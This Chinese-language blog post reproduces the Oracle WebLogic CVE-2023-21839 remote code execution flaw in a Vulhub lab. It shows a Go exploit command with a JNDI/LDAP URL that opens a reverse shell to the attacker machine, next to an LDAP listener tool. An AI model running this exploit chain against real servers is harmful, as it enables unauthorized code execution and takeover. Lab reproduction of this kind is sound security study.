【漏洞复现】Weblogic CVE-2023-21839

已于 2023-03-27 12:26:56 修改
阅读量6.2k 收藏 24
点赞数 5
分类专栏: 漏洞复现 网络安全 文章标签: 网络安全
于 2023-03-23 14:10:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zg_111/article/details/129715555
版权

一、漏洞简介

1. 产品简介

WebLogic是Oracle公司研发的用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器,在全球范围内被广泛使用。

2. 漏洞简介

Oracle发布安全公告,修复了一个存在于WebLogic Core中的远程代码执行漏洞(CVE-2023-21839),可在未经身份验证的情况下通过T3、IIOP协议远程访问并破坏易受攻击的WebLogic Server,成功利用该漏洞可能导致未授权访问和敏感信息泄露。

3. 危害等级

高危

4. 影响范围

Oracle Weblogic Server 12.2.1.3.0

Oracle Weblogic Server 12.2.1.4.0

Oracle Weblogic Server 14.1.1.0.0

二、复现环境

靶机(搭建的Vulhub漏洞测试靶场):192.168.15.15
攻击机(kali):192.168.15.131
Vulhub漏洞测试靶场的搭建可参考:Vulhub漏洞测试靶场搭建

三、复现过程

1. 启动漏洞环境

使用Vulhub启动漏洞环境

在这里插入图片描述

2. 验证漏洞环境

访问链接:http://192.168.15.15:7001/console/login/LoginForm.jsp 即可访问到后台管理登录界面,出现以下界面证明环境搭建成功。

在这里插入图片描述

3. 漏洞复现

用到的两个工具:JNDIExploit-1.2-SNAPSHOT.jarCVE-2023-21839

第一步:使用工具JNDIExploit-1.2-SNAPSHOT.jar在kali上设置监听:
在这里插入图片描述
第二步:打开kali监听端口
在这里插入图片描述
第三步:使用CVE-2023-21839工具来进行攻击测试(将工具上传至kali进行编译,然后再执行)

cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 192.168.15.15 -port 7001 -ldap ldap://192.168.15.131:1389/Basic/ReverseShell/192.168.15.131/6666

在这里插入图片描述

第一次执行报错 提示 Exception in thread "LDAPListener client connection reader for connection from 的错误。解决方法:需要去下载对应服务器版本的java的版本。

在这里插入图片描述

安装jdk1.8.0.202后再次执行(不知道如何安装java的可以参考:java安装步骤

在这里插入图片描述

第四步:成功反弹shell

在这里插入图片描述
在这里插入图片描述

最后一步:复现之后别忘记及时关闭漏洞环境

在这里插入图片描述

网络安全小时光
关注
  • 5
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:https://download.csdn.net/download/weixin_43800734/88423342 文件3:https://download.csdn.net/download/weixin_43800734/88423341 文件4:https://download.csdn.net/download/weixin_43800734/88423331
Weblogic远程代码执行漏洞CVE-2023-21839复现/保姆级讲解
BGiscool的博客
02-28 4016
由于WeblogicIIOP/T3协议存在缺陷,当IIOP/T3协议开启时,未经身份验证的攻击者通过IIOP/T3协议向受影响的服务器发送恶意的请求,最终导致在目标服务器上访问敏感信息并执行任意代码。
使用JNDIExploit-1.2-SNAPSHOT.jar复现log4j2详细流程
最新发布
m0_74196038的博客
03-19 830
还有就是之所以这个实验做了两次,就是因为在这个实验当中,我第一次做的时候,由于这个复现是使用那个脚本,所以直接使用命令去开启http服务和ldap服务 ,但是我发现开启了http服务,但是没法访问到,我以为是环境的问题,就打算第二天再做。结果第二天还是不行,后来终于搞明白了,他这里使用工具开启http服务的指令,实际上并没有真正的开启http服务,只是做了一个端口监听,让靶机误以为开启了ldap服务和http服务。-i 指定开启服务的ip,也就是攻击者的ip,也可以是黑客的公网服务器。
kali-linux-2023.3-vmware-amd64.part1.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:https://download.csdn.net/download/weixin_43800734/88423342 文件3:https://download.csdn.net/download/weixin_43800734/88423341 文件4:https://download.csdn.net/download/weixin_43800734/88423331
JNDIExploit-1.2-SNAPSHOT
03-20
JNDIExploit-1.2-SNAPSHOT
CVE-2023-21839漏洞复现
qq_34914659的博客
02-28 3933
CVE-2023-21839漏洞复现
CVE-2023-21839Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 3320
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
CVE-2023-21839远程代码执行漏洞
刘家华(游戏开发)
05-01 1465
weblogic CVE-2023-21839CVE-2023-21931、CVE-2023-21979远程代码执行漏洞复现
Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)
wangluoanquan111的博客
10-09 451
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
CVE-2023-21839:Oracle WebLogic Server RCE
qq_45747465的博客
07-07 514
努力提升自己呀
Weblogic远程代码执行漏洞CVE-2023-21839)排大坑复现成功
huayimy的博客
04-20 1225
Weblogic远程代码执行漏洞CVE-2023-21839)排大坑复现成功
CVE-2023-27253-pfsense命令注入漏洞复现(含exp)
zwy15288408160的博客
09-29 1221
NetGate Pfsense
Weblogic未授权远程代码执行漏洞 (CVE-2023-21839) vulhub复现
qq_53003652的博客
07-13 283
Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0 和 14.1.1.0.0存在安全漏洞,攻击者可利用该漏洞导致对关键数据的未授权访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。打开攻击机kali:192.168.126.130。靶机ubuntu:192.168.126.128。攻击机kali:192.168.126.130。成功创建hacker文件。nc成功获得shell。
CVE-2023-21839 【vulhub weblogic 漏洞复现
weixin_65722679的博客
07-05 659
CVE-2023-21839 【vulhub weblogic 漏洞复现
cve20201938漏洞复现
05-16
cve20201938漏洞是指微软Windows操作系统中的文件共享协议(SMBv3)存在安全漏洞,攻击者可以通过利用该漏洞,远程执行恶意代码,导致系统被攻击者完全控制。为了防止黑客攻击,我们需要复现漏洞并及时进行修复。 具体的复现步骤如下: Step 1: 搭建虚拟环境 先安装VMware或VirtualBox虚拟软件,然后下载Windows 10虚拟镜像文件,进行设置。为防止漏洞攻击,建议将防火墙规则全部打开。 Step 2: 下载漏洞利用工具 在漏洞复现前,需要先获取利用该漏洞的Exploit,目前已经有好几种漏洞利用程序可供下载。比如,一个名为“SMBGhost”的PoC Exploit,可以用于CVE-2020-0796漏洞的利用。 Step 3: 进行漏洞利用 运行准备好的漏洞利用程序,输入目标IP,进行漏洞攻击。利用成功后,可以获取被攻击系统的完全控制权限,进而获取需要的敏感信息。 Step 4: 进行修复 在复现漏洞后,及时进行修复,以免更严重的黑客攻击。 总的来说,漏洞复现对于保护系统安全非常重要,有助于及时发现漏洞并予以修复。希望我们大家都能重视系统安全,做好必要的防护措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值